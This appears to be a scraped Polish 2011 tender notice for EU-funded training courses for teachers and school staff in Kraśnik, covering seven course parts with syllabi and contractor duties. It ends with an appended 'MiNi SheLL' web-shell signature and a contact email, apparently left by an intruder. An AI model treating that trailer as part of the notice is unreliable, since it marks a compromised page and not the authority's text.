1)	KURS ANIMATOR PRACY PROJEKTOWEJ W EDUKACJI:
	budowanie współpracy grupowej,
	tworzenie symulacji,
	kreowanie burzy mózgów,
	wykorzystanie zasobów internetowych jako bazy wiedzy,
	trening interpersonalny,
	uczniowie i ich dynamika,
	uczenie poprzez działania,
	kompetencje społeczne,
	badanie potrzeb szkoleniowych, planowanie i ewaluacja,
	wykorzystanie nowych technologii,
	negocjacje,
	analiza kompetencji,
	kreowanie wizerunku,
	praca indywidualna ze słuchaczem - trening,
	warsztaty pracy z uczniem zdolnym i trudnym
Miejsce przeprowadzenia kursów zapewnia Zamawiający. Szkolenia odbywać się będą 
w salach dydaktycznych Zespołu Placówek Oświatowych Nr 2 w Kraśniku.
Kursy będą przeprowadzane w soboty i niedziele,  - 5 godz./dzień + przerwa kawowa i przerwa na obiad.
Wykonawca zobowiązany jest do opracowania szczegółowych programów szkolenia stosownie do poziomu prowadzonego kursu.
Wykonawca zobowiązany jest do przeprowadzenie egzaminów, sporządzenie protokołu 
z egzaminu i przekazanie kopii Zamawiającemu, wydania zaświadczeń o ukończeniu kursu (zgodnie z rozporządzeniem Ministra Edukacji i Nauki z dnia 03 lutego 2006 r. 
w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności 
i kwalifikacji zawodowych w formach pozaszkolnych (Dz. U. z 2006 r., Nr 31, poz. 216)).
Wykonawca zobowiązuje się do sprawdzania obecności uczestników kursu na każdych zajęciach - obecność na zajęciach uczestnicy potwierdzają własnoręcznym podpisem na liście obecności. 
10.	Faktury opłacane będą miesięcznie. Wykonawca dostarczy faktury do dziesiątego dnia każdego miesiąca.
11.	Wykonawca zobowiązany jest do prowadzenia dziennika lekcyjnego, który przedstawia na żądanie do wglądu przedstawicielowi Zamawiającego. Dziennik będzie stanowił podstawę do rozliczenia godzin szkolenia oraz kontroli frekwencji uczestników kursu.
12.	Zamawiający zastrzega sobie prawo kontrolowania przebiegu, sposobu prowadzenia oraz efektywności szkolenia i frekwencji uczestników, wglądu do prowadzonej dokumentacji. Zamawiający będzie mógł także uczestniczyć w ocenie końcowej uczestników kursu, która będzie prowadzona w formie egzaminu. 
13.	Wykonawca jest zobowiązany do przygotowania i nieodpłatnego udostępnienia materiałów dydaktycznych dla każdego uczestnika szkolenia lub kursu, zapewnienia urządzeń/pomocy dydaktycznych niezbędnych do realizacji szkolenia. Wykonawca zapewni uczestnikom materiały szkoleniowe w postaci podręczników, ćwiczeń i płyt. Wykonawca musi posiadać potencjał kadrowy i doświadczenie gwarantujące właściwą realizację zadania.
14.	Wykonawca nie może pobierać żadnych opłat od uczestników szkolenia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.42.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Kurs kwalifikacyjny z oligofrenopedagogiki..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie w roku 2011 kursów w ramach projektu Nowoczesny nauczyciel współfinansowanego ze środków Europejskiego Funduszu Społecznego. Kursami zostaną objęci nauczyciele 
i pracownicy administracji placówek oświatowych Miasta Kraśnik. 

Nr
Zadania	
TEMAT
(cel zadania)
	Adresaci	Liczba godzin 	Liczba uczestników	Uwagi
KURS KWALIFIKACYJNY Z OLIGOFRENOPEDAGOGIKI
Celem kursu jest zdobycie uprawnień do pracy 
z dziećmi z obniżoną sprawnością intelektualną. 	Dyrektorzy 
i nauczyciele szkół	300	2x10	dwie grupy
	

Program kursów:
KURS KWALIFIKACYJNY Z OLIGOFRENOPEDAGOGIKI:
	koncepcja edukacji osób z upośledzeniem umysłowym,
	wybrane zagadnienia z zakresu psychospołecznego funkcjonowania osób 
z niepełnosprawnością intelektualną w różnym wieku rozwojowym,
	psycho-stymulacyjna diagnoza i programowanie pracy rewalidacyjnej, podstawy pracy terapeutyczno-edukacyjnej z osobami z niepełnosprawnością intelektualną,
	diagnoza potrzeb edukacyjnych uczniów o obniżonej sprawności intelektualnej 
w różnym stopniu,
	metodyczne rozwiązania (metody i techniki) w zakresie edukacji dzieci i młodzieży z lekkim, umiarkowanym i znacznym stopniem niepełnosprawności intelektualnej,
	wczesna interwencja, edukacja specjalna w przedszkolu i szkole ogólnodostępnej,
	wybrane problemy: profilaktyki, stymulacji, korekcji i psychoterapii w działaniach wspomagających rozwój osób z niepełnosprawnością intelektualną (techniki relaksacyjne, muzyka, plastyka, zabawa, drama, kompensacja funkcji percepcyjno-motorycznych, mowy, profilaktyka uzależnień itp.),
	rozwijanie kompetencji pedagogicznych nauczycieli i ich umiejętności komunikacji interpersonalnej w kontekście optymalizacji działań rewalidacyjnych,
	rodzina i inne formy wspierania osób z niepełnosprawnością intelektualną 
w środowisku,
	zastosowanie zasady indywidualizacji w usprawnianiu psychospołecznym uczniów oraz wyborze metod i form pracy,
	organizacja procesu dydaktycznego w zespole, w którym znajdują się dzieci specjalnej troski,
	ocena osiągnięć szkolnych dziecka niepełnosprawnego,
	wykorzystanie aktywności własnej dziecka niepełnosprawnego.
Miejsce przeprowadzenia kursów zapewnia Zamawiający. Szkolenia odbywać się będą w salach dydaktycznych Zespołu Placówek Oświatowych Nr 2 w Kraśniku.
Kursy będą przeprowadzane w soboty i niedziele,  5 godz./dzień + przerwa kawowa i przerwa na obiad.
Wykonawca zobowiązany jest do opracowania szczegółowych programów szkolenia stosownie do poziomu prowadzonego kursu.
Wykonawca zobowiązany jest do przeprowadzenie egzaminów, sporządzenie protokołu 
z egzaminu i przekazanie kopii Zamawiającemu, wydania zaświadczeń o ukończeniu kursu (zgodnie z rozporządzeniem Ministra Edukacji i Nauki z dnia 03 lutego 2006 r. 
w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności 
i kwalifikacji zawodowych w formach pozaszkolnych (Dz. U. z 2006 r., Nr 31, poz. 216)).
Wykonawca będzie posiadał uprawnienia do przeprowadzenia egzaminów i wydawania świadectw.
Wykonawca zobowiązuje się do sprawdzania obecności uczestników kursu na każdych zajęciach - obecność na zajęciach uczestnicy potwierdzają własnoręcznym podpisem na liście obecności. 
Faktury opłacane będą miesięcznie. Wykonawca dostarczy faktury do dziesiątego dnia każdego miesiąca.
Wykonawca zobowiązany jest do prowadzenia dziennika lekcyjnego, który przedstawia na żądanie do wglądu przedstawicielowi Zamawiającego. Dziennik będzie stanowił podstawę do rozliczenia godzin szkolenia oraz kontroli frekwencji uczestników kursu.
Zamawiający zastrzega sobie prawo kontrolowania przebiegu, sposobu prowadzenia oraz efektywności szkolenia i frekwencji uczestników, wglądu do prowadzonej dokumentacji. Zamawiający będzie mógł także uczestniczyć w ocenie końcowej uczestników kursu, która będzie prowadzona w formie egzaminu. 
Wykonawca jest zobowiązany do przygotowania i nieodpłatnego udostępnienia materiałów dydaktycznych dla każdego uczestnika szkolenia lub kursu, zapewnienia urządzeń/pomocy dydaktycznych niezbędnych do realizacji szkolenia. Wykonawca zapewni uczestnikom materiały szkoleniowe w postaci podręczników, ćwiczeń i płyt. Wykonawca musi posiadać potencjał kadrowy i doświadczenie gwarantujące właściwą realizację zadania.
Wykonawca nie może pobierać żadnych opłat od uczestników szkolenia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.42.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Kurs  grafika komputerowego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie w roku 2011 kursów 
w ramach projektu Nowoczesny nauczyciel współfinansowanego ze środków Europejskiego Funduszu Społecznego. Kursami zostaną objęci nauczyciele 
i pracownicy administracji placówek oświatowych Miasta Kraśnik. 

	
TEMAT
(cel zadania)
	Adresaci	Liczba godzin 	Liczba uczestników	Uwagi
KURS  GRAFIKA KOMPUTEROWEGO
Celem kursu jest podniesienie poziomu wiedzy oraz nabycie umiejętności zastosowania w nauczaniu grafiki komputerowej.	
Dyrektorzy 
i nauczyciele szkół	240	10	jedna grupa


Program kursu:
KURS  GRAFIKI KOMPUTEROWEJ:
	teoretyczne podstawy grafiki,
	wprowadzenie do programów graficznych,
	projekty graficzne,
	programowanie wirtualnej rzeczywistości z zastosowaniem języka VRML,
	programowanie stron WWW,
	programowanie w OpenGL,
	warsztaty praktyczne,
	prezentacje multimedialne na programie PowerPoint,
Miejsce przeprowadzenia kursów zapewnia Zamawiający. Szkolenia odbywać się będą w salach dydaktycznych Zespołu Placówek Oświatowych Nr 2 w Kraśniku.
Kursy będą przeprowadzane w soboty i niedziele,  5 godz./dzień + przerwa kawowa i przerwa na obiad.
Wykonawca zobowiązany jest do opracowania szczegółowych programów szkolenia stosownie do poziomu prowadzonego kursu.
Wykonawca zobowiązany jest do przeprowadzenie egzaminów, sporządzenie protokołu 
z egzaminu i przekazanie kopii Zamawiającemu, wydania zaświadczeń o ukończeniu kursu (zgodnie z rozporządzeniem Ministra Edukacji i Nauki z dnia 03 lutego 2006 r. 
w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności 
i kwalifikacji zawodowych w formach pozaszkolnych (Dz. U. z 2006 r., Nr 31, poz. 216)).
Wykonawca zobowiązuje się do sprawdzania obecności uczestników kursu na każdych zajęciach - obecność na zajęciach uczestnicy potwierdzają własnoręcznym podpisem na liście obecności. 
Faktury opłacane będą miesięcznie. Wykonawca dostarczy faktury do dziesiątego dnia każdego miesiąca.
Wykonawca zobowiązany jest do prowadzenia dziennika lekcyjnego, który przedstawia na żądanie do wglądu przedstawicielowi Zamawiającego. Dziennik będzie stanowił podstawę do rozliczenia godzin szkolenia oraz kontroli frekwencji uczestników kursu.
Zamawiający zastrzega sobie prawo kontrolowania przebiegu, sposobu prowadzenia oraz efektywności szkolenia i frekwencji uczestników, wglądu do prowadzonej dokumentacji. Zamawiający będzie mógł także uczestniczyć w ocenie końcowej uczestników kursu, która będzie prowadzona w formie egzaminu. 
Wykonawca jest zobowiązany do przygotowania i nieodpłatnego udostępnienia materiałów dydaktycznych dla każdego uczestnika szkolenia lub kursu, zapewnienia urządzeń/pomocy dydaktycznych niezbędnych do realizacji szkolenia. Wykonawca zapewni uczestnikom materiały szkoleniowe w postaci podręczników, ćwiczeń i płyt. Wykonawca musi posiadać potencjał kadrowy i doświadczenie gwarantujące właściwą realizację zadania.
Wykonawca nie może pobierać żadnych opłat od uczestników szkolenia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.42.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Kurs języka angielskiego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie w roku 2011 kursów w ramach projektu Nowoczesny nauczyciel współfinansowanego ze środków Europejskiego Funduszu Społecznego. Kursami zostaną objęci nauczyciele 
i pracownicy administracji placówek oświatowych Miasta Kraśnik. 

TEMAT
(cel zadania)
	Adresaci	Liczba godzin 	Liczba uczestników	Uwagi
KURS JĘZYKA ANGIELSKIEGO
Celem kursu jest zdobycie certyfikatu B2 
i  uprawnień do nauki języka angielskiego 
w przedszkolach i klasach I-III szkół podstawowych.	
Dyrektorzy 
i nauczyciele szkół	300	2x10	dwie grupy
	
Program kursów:
KURS JĘZYKA ANGIELSKIEGO:
	zagadnienia gramatyczne, słownictwo, frazeologia i elementy słowotwórstwa,
	komunikacja,
	formy pisemne,
	rozumienie ze słuchu,
	czytanie ze zrozumieniem.
Miejsce przeprowadzenia kursów zapewnia Zamawiający. Szkolenia odbywać się będą w salach dydaktycznych Zespołu Placówek Oświatowych Nr 2 w Kraśniku.
Kursy będą przeprowadzane w soboty i niedziele, 5 godz./dzień + przerwa kawowa i przerwa na obiad. 
Wykonawca zobowiązany jest do opracowania szczegółowych programów szkolenia stosownie do poziomu prowadzonego kursu.
Wykonawca przeprowadzi wstępną ocenę poziomu słuchaczy - testy kwalifikacyjne.
Wykonawca zobowiązany jest do przeprowadzenie egzaminów, sporządzenie protokołu 
z egzaminu i przekazanie kopii Zamawiającemu, wydania zaświadczeń o ukończeniu kursu (zgodnie z rozporządzeniem Ministra Edukacji i Nauki z dnia 03 lutego 2006 r. 
w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności 
i kwalifikacji zawodowych w formach pozaszkolnych (Dz. U. z 2006 r., Nr 31, poz. 216)).
Wykonawca będzie posiadał uprawnienia do przeprowadzenia egzaminów i wydawania świadectw.
Wykonawca zobowiązuje się do sprawdzania obecności uczestników kursu na każdych zajęciach - obecność na zajęciach uczestnicy potwierdzają własnoręcznym podpisem na liście obecności. 
Faktury opłacane będą miesięcznie. Wykonawca dostarczy faktury do dziesiątego dnia każdego miesiąca.
Wykonawca zobowiązany jest do prowadzenia dziennika lekcyjnego, który przedstawia na żądanie do wglądu przedstawicielowi Zamawiającego. Dziennik będzie stanowił podstawę do rozliczenia godzin szkolenia oraz kontroli frekwencji uczestników kursu.
Zamawiający zastrzega sobie prawo kontrolowania przebiegu, sposobu prowadzenia oraz efektywności szkolenia i frekwencji uczestników, wglądu do prowadzonej dokumentacji. Zamawiający będzie mógł także uczestniczyć w ocenie końcowej uczestników kursu, która będzie prowadzona w formie egzaminu. 
Wykonawca jest zobowiązany do przygotowania i nieodpłatnego udostępnienia materiałów dydaktycznych dla każdego uczestnika szkolenia lub kursu, zapewnienia urządzeń/pomocy dydaktycznych niezbędnych do realizacji szkolenia. Wykonawca zapewni uczestnikom materiały szkoleniowe w postaci podręczników, ćwiczeń i płyt. Wykonawca musi posiadać potencjał kadrowy i doświadczenie gwarantujące właściwą realizację zadania.
Wykonawca nie może pobierać żadnych opłat od uczestników szkolenia.

Wskazówki metodyczne do zadań nr 4 i nr 5: 
1)	Proces dydaktyczny powinien zapewnić słuchaczom wymierne efekty w postaci znajomości języka obcego w czterech obowiązujących sprawnościach - w zakresie czytania, pisania, mówienia, słuchu. 
2)	W trakcie kształcenia słuchaczy należy wykorzystywać pełną gamę dostępnych, właściwie dobranych, nowoczesnych materiałów i środków dydaktycznych. 
3)	Kształcenie słuchaczy powinno uwzględniać najnowsze osiągnięcia metodyki nauczania języków obcych. 
4)	Rozwijanie sprawności rozumienia ze słuchu powinno być realizowane poprzez słuchanie nagrań tekstów podręcznikowych, radiowych i telewizyjnych. Po ich wysłuchaniu należy przeprowadzać ćwiczenia sprawdzające prawidłowe zrozumienie 
i zapamiętywanie przekazanych informacji. 
5)	Rozwijanie sprawności mówienia powinno być realizowane w formie zajęć konwersacyjnych. Konwersacje należy przeprowadzać w oparciu o wcześniej poznane materiały audio-wizualne lub przeczytane teksty.
6)	Rozwijanie sprawności czytania należy realizować przez cały okres nauki korzystając z tekstów poszerzających leksykę, utrwalających zagadnienia gramatyczne oraz pozwalających rozwijać umiejętność wyszukiwania najważniejszych informacji 
w danym tekście. 
7)	Rozwijanie sprawności pisania realizować należy poprzez pisanie różnego rodzaju tekstów, ze szczególnym naciskiem na treść i formę..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.42.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Kurs języka niemieckiego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie w roku 2011 kursów w ramach projektu Nowoczesny nauczyciel współfinansowanego ze środków Europejskiego Funduszu Społecznego. Kursami zostaną objęci nauczyciele 
i pracownicy administracji placówek oświatowych Miasta Kraśnik. 

TEMAT
(cel zadania)
	Adresaci	Liczba godzin 	Liczba uczestników	Uwagi
KURS JĘZYKA NIEMIECKIEGO
Celem kursu jest zdobycie certyfikatu B2 
i  uprawnień do nauki języka niemieckiego 
w przedszkolach i klasach I-III szkół podstawowych.	
Dyrektorzy 
i nauczyciele szkół	300	2x9	dwie grupy
	
Program kursów:
KURS JĘZYKA NIEMIECKIEGO:
	zagadnienia gramatyczne, słownictwo, frazeologia i elementy słowotwórstwa,
	komunikacja,
	formy pisemne,
	rozumienie ze słuchu,
	czytanie ze zrozumieniem.
Miejsce przeprowadzenia kursów zapewnia Zamawiający. Szkolenia odbywać się będą w salach dydaktycznych Zespołu Placówek Oświatowych Nr 2 w Kraśniku.
Kursy będą przeprowadzane w soboty i niedziele, 5 godz./dzień + przerwa kawowa i przerwa na obiad. 
Wykonawca zobowiązany jest do opracowania szczegółowych programów szkolenia stosownie do poziomu prowadzonego kursu.
Wykonawca przeprowadzi wstępną ocenę poziomu słuchaczy - testy kwalifikacyjne.
Wykonawca zobowiązany jest do przeprowadzenie egzaminów, sporządzenie protokołu 
z egzaminu i przekazanie kopii Zamawiającemu, wydania zaświadczeń o ukończeniu kursu (zgodnie z rozporządzeniem Ministra Edukacji i Nauki z dnia 03 lutego 2006 r. 
w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności 
i kwalifikacji zawodowych w formach pozaszkolnych (Dz. U. z 2006 r., Nr 31, poz. 216)).
Wykonawca będzie posiadał uprawnienia do przeprowadzenia egzaminów i wydawania świadectw.
Wykonawca zobowiązuje się do sprawdzania obecności uczestników kursu na każdych zajęciach - obecność na zajęciach uczestnicy potwierdzają własnoręcznym podpisem na liście obecności. 
Faktury opłacane będą miesięcznie. Wykonawca dostarczy faktury do dziesiątego dnia każdego miesiąca.
Wykonawca zobowiązany jest do prowadzenia dziennika lekcyjnego, który przedstawia na żądanie do wglądu przedstawicielowi Zamawiającego. Dziennik będzie stanowił podstawę do rozliczenia godzin szkolenia oraz kontroli frekwencji uczestników kursu.
Zamawiający zastrzega sobie prawo kontrolowania przebiegu, sposobu prowadzenia oraz efektywności szkolenia i frekwencji uczestników, wglądu do prowadzonej dokumentacji. Zamawiający będzie mógł także uczestniczyć w ocenie końcowej uczestników kursu, która będzie prowadzona w formie egzaminu. 
Wykonawca jest zobowiązany do przygotowania i nieodpłatnego udostępnienia materiałów dydaktycznych dla każdego uczestnika szkolenia lub kursu, zapewnienia urządzeń/pomocy dydaktycznych niezbędnych do realizacji szkolenia. Wykonawca zapewni uczestnikom materiały szkoleniowe w postaci podręczników, ćwiczeń i płyt. Wykonawca musi posiadać potencjał kadrowy i doświadczenie gwarantujące właściwą realizację zadania.
Wykonawca nie może pobierać żadnych opłat od uczestników szkolenia.

Wskazówki metodyczne do zadań nr 4 i nr 5: 
1)	Proces dydaktyczny powinien zapewnić słuchaczom wymierne efekty w postaci znajomości języka obcego w czterech obowiązujących sprawnościach - w zakresie czytania, pisania, mówienia, słuchu. 
2)	W trakcie kształcenia słuchaczy należy wykorzystywać pełną gamę dostępnych, właściwie dobranych, nowoczesnych materiałów i środków dydaktycznych. 
3)	Kształcenie słuchaczy powinno uwzględniać najnowsze osiągnięcia metodyki nauczania języków obcych. 
4)	Rozwijanie sprawności rozumienia ze słuchu powinno być realizowane poprzez słuchanie nagrań tekstów podręcznikowych, radiowych i telewizyjnych. Po ich wysłuchaniu należy przeprowadzać ćwiczenia sprawdzające prawidłowe zrozumienie 
i zapamiętywanie przekazanych informacji. 
5)	Rozwijanie sprawności mówienia powinno być realizowane w formie zajęć konwersacyjnych. Konwersacje należy przeprowadzać w oparciu o wcześniej poznane materiały audio-wizualne lub przeczytane teksty.
6)	Rozwijanie sprawności czytania należy realizować przez cały okres nauki korzystając z tekstów poszerzających leksykę, utrwalających zagadnienia gramatyczne oraz pozwalających rozwijać umiejętność wyszukiwania najważniejszych informacji 
w danym tekście. 
7)	Rozwijanie sprawności pisania realizować należy poprzez pisanie różnego rodzaju tekstów, ze szczególnym naciskiem na treść i formę..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.42.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Kurs z zakresu audytu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie w roku 2011 kursów 
w ramach projektu Nowoczesny nauczyciel współfinansowanego ze środków Europejskiego Funduszu Społecznego. Kursami zostaną objęci nauczyciele 
i pracownicy administracji placówek oświatowych Miasta Kraśnik. 

	
TEMAT
(cel zadania)
	Adresaci	Liczba godzin 	Liczba uczestników	Uwagi
KURS Z ZAKRESU AUDYTU
Celem kursu jest zdobycie i ugruntowanie wiedzy 
z zakresu audytu.	Pracownicy administracji szkół	120	11	jedna grupa
2.	Program kursów:
1)	KURS Z ZAKRESU AUDYTU:
	kontrola i audyt wewnętrzny według międzynarodowych standardów,
	księga procedur,
	audyt wewnętrzny a kontrola zewnętrzna,
	audyt wewnętrzny a kontrola finansowa,
	planowanie audytu wewnętrznego,
	planowanie audytu - ćwiczenia praktyczne,
	przestępstwa gospodarcze - mechanizmy,
	faza wstępna zadania audytowego,
	metodyka przeprowadzenia audytu wewnętrznego - studium przypadku.
3.	Miejsce przeprowadzenia kursów zapewnia Zamawiający. Szkolenia odbywać się będą 
w salach dydaktycznych Zespołu Placówek Oświatowych Nr 2 w Kraśniku.
4.	Kursy będą przeprowadzane w soboty i niedziele, 4 godz./dzień + przerwa kawowa i przerwa na obiad. 
5.	Wykonawca zobowiązany jest do opracowania szczegółowych programów szkolenia stosownie do poziomu prowadzonego kursu.
6.	Wykonawca zobowiązany jest do przeprowadzenie egzaminów, sporządzenie protokołu 
z egzaminu i przekazanie kopii Zamawiającemu, wydania zaświadczeń o ukończeniu kursu (zgodnie z rozporządzeniem Ministra Edukacji i Nauki z dnia 03 lutego 2006 r. 
w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności 
i kwalifikacji zawodowych w formach pozaszkolnych (Dz. U. z 2006 r., Nr 31, poz. 216)).
7.	Wykonawca zobowiązuje się do sprawdzania obecności uczestników kursu na każdych zajęciach - obecność na zajęciach uczestnicy potwierdzają własnoręcznym podpisem na liście obecności. 
8.	Faktury opłacane będą miesięcznie. Wykonawca dostarczy faktury do dziesiątego dnia każdego miesiąca.
9.	Wykonawca zobowiązany jest do prowadzenia dziennika lekcyjnego, który przedstawia na żądanie do wglądu przedstawicielowi Zamawiającego. Dziennik będzie stanowił podstawę do rozliczenia godzin szkolenia oraz kontroli frekwencji uczestników kursu.
10.	Zamawiający zastrzega sobie prawo kontrolowania przebiegu, sposobu prowadzenia oraz efektywności szkolenia i frekwencji uczestników, wglądu do prowadzonej dokumentacji. Zamawiający będzie mógł także uczestniczyć w ocenie końcowej uczestników kursu, która będzie prowadzona w formie egzaminu. 
11.	Wykonawca jest zobowiązany do przygotowania i nieodpłatnego udostępnienia materiałów dydaktycznych dla każdego uczestnika szkolenia lub kursu, zapewnienia urządzeń/pomocy dydaktycznych niezbędnych do realizacji szkolenia. Wykonawca zapewni uczestnikom materiały szkoleniowe w postaci podręczników, ćwiczeń i płyt. Wykonawca musi posiadać potencjał kadrowy i doświadczenie gwarantujące właściwą realizację zadania.
12.	Wykonawca nie może pobierać żadnych opłat od uczestników szkolenia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.42.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Kurs z zakresu zamówień publicznych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie w roku 2011 kursów 
w ramach projektu Nowoczesny nauczyciel współfinansowanego ze środków Europejskiego Funduszu Społecznego. Kursami zostaną objęci nauczyciele 
i pracownicy administracji placówek oświatowych Miasta Kraśnik. 

TEMAT
(cel zadania)
	Adresaci	Liczba godzin 	Liczba uczestników	Uwagi
KURS Z ZAKRESU ZAMÓWIEŃ PUBLICZNYCH
Celem kursu jest zdobycie i ugruntowanie wiedzy 
z zakresu zamówień publicznych.	Pracownicy administracji szkół	120	11	

jedna grupa

2.	Program kursów:
1)	KURS Z ZAKRESU ZAMÓWIEŃ PUBLICZNYCH:
	zestawienie obowiązujących przepisów prawa związanych z funkcjonującym systemem zamówień publicznych - wprowadzenie do Prawa zamówień publicznych,
	pojęcia podstawowe,
	wyłączenia całkowite i częściowe ze stosowania ustawy,
	zasady udzielania zamówień publicznych,
	kwoty progowe w zamówieniach publicznych - zależność procedur od przedmiotu zamówienia i jego wartości,
	przygotowanie postępowania o udzielenie zamówienia publicznego (podstawa wszczęcia postępowania),
	opis przedmiotu zamówienia,
	szacowanie wartości przedmiotu zamówienia,
	zasady sporządzania Specyfikacji Istotnych Warunków Zamówienia,
	tryby udzielania zamówień publicznych,
	wybór oferty najkorzystniejszej,
	dokumentowanie postępowania o udzielenie zamówienia publicznego,
	procedura odwoławcza,
	umowy w zamówieniach publicznych i ich specyfika,
	kontrola zamówień publicznych,
	możliwe problemy interpretacyjne na prowadzone postępowania o udzielenie zamówienia.
3.	Miejsce przeprowadzenia kursów zapewnia Zamawiający. Szkolenia odbywać się będą 
w salach dydaktycznych Zespołu Placówek Oświatowych Nr 2 w Kraśniku.
4.	Kursy będą przeprowadzane w soboty i niedziele, 4 godz./dzień + przerwa kawowa i przerwa na obiad. 
5.	Wykonawca zobowiązany jest do opracowania szczegółowych programów szkolenia stosownie do poziomu prowadzonego kursu.
6.	Wykonawca zobowiązany jest do przeprowadzenie egzaminów, sporządzenie protokołu 
z egzaminu i przekazanie kopii Zamawiającemu, wydania zaświadczeń o ukończeniu kursu (zgodnie z rozporządzeniem Ministra Edukacji i Nauki z dnia 03 lutego 2006 r. 
w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności 
i kwalifikacji zawodowych w formach pozaszkolnych (Dz. U. z 2006 r., Nr 31, poz. 216)).
7.	Wykonawca zobowiązuje się do sprawdzania obecności uczestników kursu na każdych zajęciach - obecność na zajęciach uczestnicy potwierdzają własnoręcznym podpisem na liście obecności. 
8.	Faktury opłacane będą miesięcznie. Wykonawca dostarczy faktury do dziesiątego dnia każdego miesiąca.
9.	Wykonawca zobowiązany jest do prowadzenia dziennika lekcyjnego, który przedstawia na żądanie do wglądu przedstawicielowi Zamawiającego. Dziennik będzie stanowił podstawę do rozliczenia godzin szkolenia oraz kontroli frekwencji uczestników kursu.
10.	Zamawiający zastrzega sobie prawo kontrolowania przebiegu, sposobu prowadzenia oraz efektywności szkolenia i frekwencji uczestników, wglądu do prowadzonej dokumentacji. Zamawiający będzie mógł także uczestniczyć w ocenie końcowej uczestników kursu, która będzie prowadzona w formie egzaminu. 
11.	Wykonawca jest zobowiązany do przygotowania i nieodpłatnego udostępnienia materiałów dydaktycznych dla każdego uczestnika szkolenia lub kursu, zapewnienia urządzeń/pomocy dydaktycznych niezbędnych do realizacji szkolenia. Wykonawca zapewni uczestnikom materiały szkoleniowe w postaci podręczników, ćwiczeń i płyt. Wykonawca musi posiadać potencjał kadrowy i doświadczenie gwarantujące właściwą realizację zadania.
12.	Wykonawca nie może pobierać żadnych opłat od uczestników szkolenia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.42.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com